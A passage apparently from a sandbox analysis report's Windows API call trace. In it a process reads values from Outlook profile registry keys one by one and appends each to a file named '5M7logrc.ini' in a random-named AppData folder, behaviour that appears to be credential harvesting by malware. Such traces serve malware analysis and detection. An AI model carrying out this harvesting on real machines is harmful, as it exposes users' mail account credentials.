Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.685] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.685] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.685] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x30, ByteOffset=0xdd5fc*=1278, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.685] NtClose (Handle=0x150) returned 0x0 [0236.686] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.686] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.686] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.686] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.686] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1c, ByteOffset=0xdd5fc*=1326, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.687] NtClose (Handle=0x150) returned 0x0 [0236.688] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0xd, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.688] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.688] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.688] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.688] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x20, ByteOffset=0xdd5fc*=1354, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.688] NtClose (Handle=0x150) returned 0x0 [0236.689] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.689] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.689] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.689] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.689] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x14, ByteOffset=0xdd5fc*=1386, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.689] NtClose (Handle=0x150) returned 0x0 [0236.700] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0xe, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x8000001a [0236.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd71c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.700] NtCreateFile (in: FileHandle=0xdd73c, DesiredAccess=0x12019f, ObjectAttributes=0xdd704*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd724, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd73c*=0x150, IoStatusBlock=0xdd724*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.700] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.700] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd724, FileInformation=0xdd67c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd724, FileInformation=0xdd67c) returned 0x0 [0236.700] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd724, Buffer=0x705c78*, Length=0x4, ByteOffset=0xdd694*=1406, Key=0x0 | out: IoStatusBlock=0xdd724, Buffer=0x705c78*) returned 0x0 [0236.701] NtClose (Handle=0x150) returned 0x0 [0236.702] NtClose (Handle=0x140) returned 0x0 [0236.702] NtEnumerateKey (in: KeyHandle=0x138, Index=0x2, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x0 [0236.702] NtCreateKey (in: KeyHandle=0xde3cc, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3cc*=0x140) returned 0x0 [0236.702] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.702] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.702] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.703] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.703] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.703] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0xc, ByteOffset=0xdd5fc*=1410, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.703] NtClose (Handle=0x150) returned 0x0 [0236.704] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.704] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.705] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.705] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.708] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x52, ByteOffset=0xdd5fc*=1422, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.708] NtClose (Handle=0x150) returned 0x0 [0236.709] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.709] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.709] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.710] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.710] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.710] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x12, ByteOffset=0xdd5fc*=1504, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.710] NtClose (Handle=0x150) returned 0x0 [0236.725] RtlIntegerToChar (in: Value=0x3c53db58, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="1012128600") returned 0x0 [0236.725] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.725] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.726] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.726] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.726] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x18, ByteOffset=0xdd5fc*=1522, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.726] NtClose (Handle=0x150) returned 0x0 [0236.727] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.727] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.728] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.728] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.728] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x18, ByteOffset=0xdd5fc*=1546, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.733] NtClose (Handle=0x150) returned 0x0 [0236.734] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.734] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.734] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.734] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.734] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x14, ByteOffset=0xdd5fc*=1570, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.734] NtClose (Handle=0x150) returned 0x0 [0236.736] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.736] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.736] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.736] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.736] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1a, ByteOffset=0xdd5fc*=1590, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.736] NtClose (Handle=0x150) returned 0x0 [0236.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.737] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.737] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.737] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.737] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x18, ByteOffset=0xdd5fc*=1616, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.738] NtClose (Handle=0x150) returned 0x0 [0236.743] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.743] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.743] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.743] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.743] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.743] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1c, ByteOffset=0xdd5fc*=1640, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.743] NtClose (Handle=0x150) returned 0x0 [0236.763] RtlIntegerToChar (in: Value=0x4, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="4") returned 0x0 [0236.763] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.763] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.764] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.764] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.764] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x6, ByteOffset=0xdd5fc*=1668, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.764] NtClose (Handle=0x150) returned 0x0 [0236.765] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.765] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", 